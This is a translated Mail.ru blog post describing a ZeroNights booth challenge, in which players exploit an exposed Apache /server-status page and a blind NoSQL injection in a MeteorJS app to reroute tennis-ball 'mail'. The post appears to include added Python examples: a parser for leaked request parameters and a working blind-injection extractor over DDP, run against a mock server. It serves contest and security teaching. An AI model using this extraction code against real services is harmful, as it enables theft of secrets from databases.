How bug hunters intercepted letters in the pneumatic mail at ZeroNights
Much has already been said about bug bounty programs, and the need for them seems obvious to companies by now. Over the lifetime of our own program, Mail.ru Mail has paid out more than $250,000, with an average payout of $379; we have written a little more about that before. Today, using the recent ZeroNights information security conference as an example, we will talk about how specialized events can attract hackers to hunt for bugs and vulnerabilities. This year ZeroNights was held at the A2 Green Concert club in St. Petersburg. Despite the move from Moscow, the conference gathered more than 1,000 participants over two days. Many excellent specialists gave talks. If you want something hardcore, see "NUClear explotion", "From Graphic Mode To God Mode, Discovery Vulnerabilities of GPU Virtualization" and "Researching Marvell Avastar Wi-Fi: From Zero Risk to RCE". There were also many interesting web talks this year; the slides from WebVillage and the other tracks are available. Personally, the talk by Ilya Nesterov and Sergey Shekyan was the important one for me: telling a bot from a real user is becoming harder and harder. More about the talks here.
Our goals
We set ourselves the following goals:
Promoting the brand and the Bug Bounty program in the community.
Recruiting sensible specialists who successfully cope with the tasks.
Idea
The hardest part of such projects is to develop interesting tasks that, first, attract participants and, second, let us test their real skills.
Our booth this year was an office building equipped with pneumatic mail. The essence of the task: the boss sends letters to the accountant through the pneumatic mail, and the hacker's job is to change the route and intercept the letter with the help of special valves.
The stand looked like this:
Instead of real mail we used tennis balls, which dropped from top to bottom into the appropriate bins, by default into "accounting". The goal was to activate the valves, controlled by an Arduino and a Raspberry Pi 3, and redirect the "mail" into other bins.
Action scheme:
Connect to the Wi-Fi network of the task.
Find the Raspberry Pi on the network; it is connected to the Arduino that controls the valves.
The RPi runs a web server. Two tasks have to be completed by exploiting vulnerabilities; at the end, buttons appear that activate the valves and let the participant redirect the "mail".
The ball stands in for a pneumatic letter:
We took the ideas for the tasks from our researchers' reports.
Tasks
In the first task, participants had to find the RPi3 host and discover a typical Apache configuration vulnerability: the /server-status page exposed by mod_status, which shows the request line currently or last handled by each worker. Among the others, this page showed a request carrying a secret value in its GET parameters, which let you pass the first level. For this task, visitors received a $100 promotional code for participation in our Bug Bounty program.
Solution
The Apache configuration vulnerability is found with the usual directory brute-forcing tools such as DirBuster; the string server-status is in every current wordlist. In addition, we left a few hints so the task could be solved without any scripts or tools, even from an ordinary phone.
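As an added example (not the contest's own code), here is the check a participant would script once /server-status has been found: pull every request line out of the mod_status HTML and list the GET parameters it leaks. The status page fragment below is constructed for the example; the host addresses, the /level1 path and the EXAMPLE_SECRET value are assumptions, not the values used at the booth.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed fragment of an Apache mod_status page. Only the format of the
# "Request" column matters; the addresses, paths and token are made up.
SAMPLE_STATUS = """
<h1>Apache Server Status for 192.168.0.10 (via 192.168.0.10)</h1>
<table border="0"><tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU</th><th>SS</th><th>Req</th><th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>VHost</th><th>Request</th></tr>
<tr><td><b>0-0</b></td><td>1180</td><td>0/12/12</td><td>_</td><td>0.03</td><td>4</td><td>1</td><td>0.0</td><td>0.01</td><td>0.01</td><td>192.168.0.42</td><td>192.168.0.10:80</td><td nowrap>GET /index.html HTTP/1.1</td></tr>
<tr><td><b>0-1</b></td><td>1181</td><td>0/9/9</td><td>_</td><td>0.02</td><td>7</td><td>2</td><td>0.0</td><td>0.00</td><td>0.00</td><td>10.0.0.5</td><td>192.168.0.10:80</td><td nowrap>GET /level1?token=EXAMPLE_SECRET&amp;user=boss HTTP/1.1</td></tr>
<tr><td><b>1-0</b></td><td>1182</td><td>1/3/3</td><td>W</td><td>0.01</td><td>0</td><td>0</td><td>0.5</td><td>0.00</td><td>0.00</td><td>192.168.0.77</td><td>192.168.0.10:80</td><td nowrap>GET /server-status HTTP/1.1</td></tr>
</table>
"""

# A request line as mod_status prints it: "<METHOD> <target> HTTP/<version>".
REQUEST_LINE = re.compile(r"\b(GET|POST|HEAD|PUT|DELETE|OPTIONS|PATCH)\s+(\S+)\s+HTTP/\d\.\d")


def request_lines(status_html):
    """Return (method, target) pairs for every request line shown on the page."""
    return [(m.group(1), html.unescape(m.group(2)))
            for m in REQUEST_LINE.finditer(status_html)]


def leaked_query_params(status_html):
    """Map each request path that carried a query string to its decoded GET parameters."""
    leaks = {}
    for _method, target in request_lines(status_html):
        parts = urlsplit(target)
        if parts.query:
            leaks[parts.path] = dict(parse_qsl(parts.query, keep_blank_values=True))
    return leaks


def fetch_status(base_url, timeout=5):
    """Fetch the live page from a host (network access; not used by the offline demo)."""
    from urllib.request import urlopen
    with urlopen(base_url.rstrip("/") + "/server-status", timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    for path, params in leaked_query_params(SAMPLE_STATUS).items():
        print(path, params)
```

Two points for whoever administers the box: the per-worker request table is only rendered while ExtendedStatus is on (the default in Apache 2.4 once mod_status is loaded), and the fix is to restrict the `<Location "/server-status">` block with `Require ip 127.0.0.1` (or simply not load mod_status) rather than to rely on the path being unknown, since, as noted above, it is in every wordlist.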
To pass the second task, it was necessary to examine carefully the contents of the already known monitoring page. In the client application code one had to find a hidden method that was never called from the interface but contained a vulnerability: a blind NoSQL injection into MongoDB.
Solution
To automate a blind injection, two things are needed:
Write a script that can retrieve one bit of information per request. As a result you need to be able to insert a logical expression of interest into the query and, from the server's response, tell whether it is true or false.
Work out how to pull the data of interest out of the database bit by bit. For example, to learn the value of the field secret = 'some_secret' you can use regular expressions: first determine the first character with secret ~ '^a', secret ~ '^b' ... secret ~ '^s' ..., then the second with secret ~ '^sa', secret ~ '^sb' ..., and so on until the whole secret token is recovered.
This is neither the only nor the most efficient implementation; better options can be found in the sqlmap code.
The main difficulty was the atypical technology stack: MeteorJS, which makes heavy use of WebSockets, plus MongoDB and pub/sub instead of the usual HTTP requests and responses. This ruled out existing tools and required participants to automate the attack themselves. Many participants looked for vulnerabilities in the MeteorJS platform's own functionality, mistaking it for the task code. Some also had difficulty automating requests over WebSockets.
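The following is an added example, not the contest's code, covering both the bit-by-bit extraction described in the solution above and the DDP-over-WebSocket detail that tripped up participants. It models both sides of the exchange offline: a tiny stand-in for the hidden Meteor method (splicing the client's selector straight into a Mongo query and answering only true/false), and an attacker that asks one question per DDP method message. The collection contents, the method name internalLookup and the token charset are assumptions. It goes one step beyond the write-up: besides the linear character-by-character search, extract_bisect uses a regex character class to halve the candidate set on every request, which is the kind of improvement the text points to in sqlmap.

```python
import json
import re
import string

# Constructed stand-in for the contest backend. The real hidden Meteor method,
# the collection and the token differ; these names are assumptions.
DOCS = [{"_id": 1, "secret": "s3cr3t_t0k3n"}]   # constructed sample collection
HIDDEN_METHOD = "internalLookup"                  # hypothetical hidden DDP method name


def mongo_find(query):
    """Minimal emulation of MongoDB matching: equality plus the $regex operator."""
    hits = []
    for doc in DOCS:
        for field, cond in query.items():
            val = doc.get(field)
            if isinstance(cond, dict) and "$regex" in cond:
                if not isinstance(val, str) or re.search(cond["$regex"], val) is None:
                    break
            elif val != cond:
                break
        else:
            hits.append(doc)
    return hits


def server_handle(raw):
    """Server side: parse a DDP 'method' message, splice the client-supplied selector
    straight into the query (the injection), and reply with a DDP 'result' message
    that reveals only whether anything matched: one bit per call."""
    msg = json.loads(raw)
    if msg.get("msg") != "method" or msg.get("method") != HIDDEN_METHOD:
        return json.dumps({"msg": "error", "reason": "Unknown method"})
    selector = msg["params"][0]
    found = bool(mongo_find({"secret": selector}))
    return json.dumps({"msg": "result", "id": msg["id"], "result": found})


class Oracle:
    """Attacker side: one DDP method call per true/false question, counting calls."""

    def __init__(self):
        self.requests = 0

    def __call__(self, regex):
        self.requests += 1
        raw = json.dumps({"msg": "method", "method": HIDDEN_METHOD,
                          "params": [{"$regex": regex}], "id": str(self.requests)})
        return json.loads(server_handle(raw))["result"]


ALPHABET = string.digits + "_" + string.ascii_lowercase   # assumed token charset


def char_class(chars):
    return "[" + "".join(re.escape(c) for c in chars) + "]"


def extract_linear(oracle, alphabet=ALPHABET, max_len=64):
    """The write-up's approach: try ^prefix+c for each candidate character in turn."""
    secret = ""
    while len(secret) < max_len:
        for ch in alphabet:
            if oracle("^" + re.escape(secret + ch)):
                secret += ch
                break
        else:
            return secret   # no character extends the prefix: the value is complete
    return secret


def extract_bisect(oracle, alphabet=ALPHABET, max_len=64):
    """Same oracle, but a regex character class halves the candidate set per request."""
    secret = ""
    while len(secret) < max_len:
        if oracle("^" + re.escape(secret) + "$"):
            return secret
        cands = list(alphabet)
        while len(cands) > 1:
            half = cands[: len(cands) // 2]
            if oracle("^" + re.escape(secret) + char_class(half)):
                cands = half
            else:
                cands = cands[len(cands) // 2:]
        if not oracle("^" + re.escape(secret + cands[0])):
            raise ValueError("next character is outside the assumed alphabet")
        secret += cands[0]
    return secret


if __name__ == "__main__":
    lin, bis = Oracle(), Oracle()
    print(extract_linear(lin), lin.requests, "requests")
    print(extract_bisect(bis), bis.requests, "requests")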
As a prize for this contest, participants received a Mail.ru Bug Hunter sweatshirt.
Results
In just two days of the conference, more than 200 people took part in our competition. 100 participants handled the first task; 45 completed the second.
Naturally, we met our goals on the spot. The $100 promo cards have a delayed effect, but several of them have already been activated and have brought us good bugs on H1. They encourage hackers to look for new bugs and help us improve our systems and their security. A small card, great results. A hundred bucks is a hundred bucks.